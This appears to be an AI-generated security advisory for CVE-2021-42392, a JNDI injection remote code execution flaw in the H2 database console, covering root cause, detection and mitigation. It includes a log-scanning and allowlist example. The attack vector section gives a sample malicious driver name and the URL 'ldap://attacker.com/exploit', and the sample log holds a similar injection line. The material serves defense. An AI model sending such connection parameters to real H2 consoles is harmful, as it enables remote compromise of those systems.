CVE-2021-42392 Overview
CVE-2021-42392 is a critical remote code execution vulnerability affecting the H2 database engine. The vulnerability exists in the org.h2.util.JdbcUtils.getConnection method, which accepts a driver class name and database URL as parameters. An attacker can exploit this by supplying a JNDI driver name along with a malicious URL pointing to an attacker-controlled LDAP or RMI server, triggering remote code execution. This vulnerability is particularly dangerous when exploited through the H2 Console, which enables unauthenticated remote code execution.
Critical Impact
This vulnerability enables unauthenticated remote code execution through JNDI injection, allowing attackers to fully compromise systems running vulnerable H2 database instances with exposed H2 Console interfaces.
Affected Products
- H2database H2 (all versions prior to patch)
- Debian Linux 9.0, 10.0, and 11.0
- Oracle Communications Cloud Native Core Policy 1.15.0
Discovery Timeline
- 2022-01-10 - CVE-2021-42392 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2021-42392
Vulnerability Analysis
This vulnerability leverages JNDI (Java Naming and Directory Interface) injection, a technique that gained significant attention following the Log4Shell vulnerability. The org.h2.util.JdbcUtils.getConnection method is designed to establish database connections using a provided driver class and URL. However, due to insufficient input validation, an attacker can specify JNDI-based driver names such as javax.naming.InitialContext combined with URLs pointing to malicious LDAP or RMI servers.
When the H2 database processes these malicious parameters, it performs a JNDI lookup to the attacker-controlled server. The remote server responds with a serialized Java object or a reference to a remote codebase, which the vulnerable H2 instance deserializes and executes. This attack chain is particularly severe because it requires no authentication when targeting the H2 Console, which is often enabled by default in development environments.
The vulnerability affects multiple attack surfaces within H2, but the H2 Console represents the most critical exposure point. Organizations using H2 as an embedded database in Java applications may also be vulnerable if the application exposes any functionality that allows user-controlled database connection parameters.
Root Cause
The root cause is classified as CWE-502 (Deserialization of Untrusted Data). The JdbcUtils.getConnection method fails to properly validate and restrict the driver class names and URLs that can be specified. By allowing arbitrary JNDI lookups through user-controlled input, the application inadvertently enables attackers to force connections to malicious naming services that return executable payloads. The lack of a whitelist for acceptable driver classes and URL schemes permits the exploitation of Java's JNDI mechanism for remote code execution.
Attack Vector
The attack is network-based and requires no authentication or user interaction when targeting the H2 Console. An attacker identifies an exposed H2 Console interface, typically accessible on port 8082 or embedded within web applications. The attacker then crafts a malicious request containing a JNDI driver name (e.g., javax.naming.InitialContext) and a URL pointing to their controlled LDAP or RMI server (e.g., ldap://attacker.com/exploit).
When the H2 database processes this connection request, it performs a JNDI lookup to the attacker's server. The malicious server responds with a Java object that, when deserialized by the vulnerable H2 instance, executes arbitrary code with the privileges of the Java process running H2.
The exploitation mechanism leverages the standard Java JNDI lookup functionality, making it difficult to detect without specific monitoring for outbound JNDI connections. Attackers typically host their malicious LDAP or RMI servers on internet-accessible infrastructure and may use common exploitation frameworks that automate payload generation.
Detection Methods for CVE-2021-42392
Indicators of Compromise
- Outbound network connections from Java processes to unexpected LDAP ports (389, 636, 1389) or RMI ports (1099)
- H2 Console access logs showing connection attempts with JNDI-style URLs containing ldap://, ldaps://, or rmi:// schemes
- Unusual process spawning from Java processes running H2 database, particularly shell commands or script interpreters
- Network traffic containing serialized Java objects or references to external codebases
Detection Strategies
- Monitor network traffic for outbound JNDI lookup patterns, specifically connections to LDAP/RMI ports originating from application servers
- Implement intrusion detection rules to identify HTTP requests to H2 Console containing JNDI injection payloads in connection parameters
- Audit Java application logs for connection attempts using non-standard driver class names, particularly javax.naming.InitialContext
- Deploy network segmentation monitoring to detect internal systems attempting to connect to external naming services
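The following is an added example (not code from the H2 project or from this advisory) that turns two passages into runnable checks: the driver/URL allowlist the Root Cause section says JdbcUtils.getConnection lacked, and the indicator rules above, run over constructed sample log lines. The console log format, the egress log format, the allowlisted driver set and the sample addresses are all assumptions made for the example.

```python
# Added example: allowlist check plus indicator rules for CVE-2021-42392-style
# JNDI injection, applied to constructed log lines (formats are assumed).
import re
from collections import namedtuple

# Driver classes a legitimate console login would name (assumed allowlist).
KNOWN_JDBC_DRIVERS = {"org.h2.Driver", "org.postgresql.Driver"}
# LDAP and RMI ports named in the indicators list.
NAMING_SERVICE_PORTS = {389, 636, 1389, 1099}

# Constructed console log format: "<ts> POST /login.do driver=<class> url=<url>"
CONSOLE_LINE = re.compile(r"^(?P<ts>\S+) POST /login\.do driver=(?P<driver>\S+) url=(?P<url>\S+)$")
# Constructed egress log format: "<ts> <process>[<pid>] -> <dst_ip>:<port>"
EGRESS_LINE = re.compile(r"^(?P<ts>\S+) (?P<proc>\w+)\[\d+\] -> (?P<dst>[\d.]+):(?P<port>\d+)$")

Alert = namedtuple("Alert", "ts kind detail")

def check_connection_params(driver, url):
    """Allowlist check of the kind the page says was missing: return the
    reasons a driver/url pair is suspicious (an empty list means it passes)."""
    reasons = []
    if driver not in KNOWN_JDBC_DRIVERS:
        reasons.append("driver not allowlisted: " + driver)
    scheme = url.split(":", 1)[0].lower()
    if scheme != "jdbc":  # ldap://, ldaps://, rmi:// etc. are JNDI lookup targets
        reasons.append("non-jdbc url scheme: " + scheme)
    return reasons

def scan_logs(lines):
    """Return Alerts for JNDI-style console logins and Java egress to naming ports."""
    alerts = []
    for line in lines:
        m = CONSOLE_LINE.match(line)
        if m:
            reasons = check_connection_params(m["driver"], m["url"])
            if reasons:
                alerts.append(Alert(m["ts"], "h2-console-jndi", "; ".join(reasons)))
            continue
        m = EGRESS_LINE.match(line)
        if m and m["proc"] == "java" and int(m["port"]) in NAMING_SERVICE_PORTS:
            alerts.append(Alert(m["ts"], "java-egress-naming-port", m["dst"] + ":" + m["port"]))
    return alerts

# Constructed sample: a benign login, a JNDI injection attempt, the LDAP callback, unrelated egress.
SAMPLE_LOG = [
    "2022-01-12T10:14:59Z POST /login.do driver=org.h2.Driver url=jdbc:h2:mem:test",
    "2022-01-12T10:15:03Z POST /login.do driver=javax.naming.InitialContext url=ldap://198.51.100.7:1389/exploit",
    "2022-01-12T10:15:04Z java[4321] -> 198.51.100.7:1389",
    "2022-01-12T10:15:05Z nginx[77] -> 203.0.113.9:443",
]

if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOG):
        print(alert)
```

The second sample line trips both allowlist reasons, and the third shows the outbound LDAP callback that the indicators list describes; pairing the two events by timestamp is what makes the alert high-confidence.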
Monitoring Recommendations
- Enable detailed logging for H2 database connection attempts and review logs for suspicious driver class or URL patterns
- Configure alerts for any outbound LDAP or RMI traffic from production application servers
- Implement endpoint detection for anomalous process creation by Java processes, especially shell interpreters or download utilities
- Monitor for creation of unexpected files or processes following H2 Console access events
How to Mitigate CVE-2021-42392
Immediate Actions Required
- Upgrade H2 database to the latest patched version immediately
- Disable the H2 Console if it is not required for production operations
- Restrict network access to H2 Console interfaces using firewall rules, limiting access to trusted administrative networks only
- Audit all applications using H2 as an embedded database to identify potential exposure points
Patch Information
H2 database has released security patches addressing this vulnerability. Organizations should update to the latest version available from the official H2 database repositories. Detailed patch information is available in the GitHub Security Advisory. Oracle has also addressed this vulnerability in affected products through the April 2022 Critical Patch Update. Debian users should apply updates as documented in DSA-5076.
Workarounds
- Disable the H2 Console entirely by removing or commenting out the webAllowOthers setting in H2 configuration
- Implement network-level controls to block outbound LDAP and RMI connections from application servers
- Configure Java security manager policies to restrict JNDI lookups to trusted naming services only
- Deploy web application firewall rules to block requests containing JNDI injection patterns in connection strings
# Configuration example - Disable H2 Console in application properties
# For Spring Boot applications, add to application.properties:
spring.h2.console.enabled=false
# For standalone H2, remove or comment these settings:
# webAllowOthers=true
# webPort=8082
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.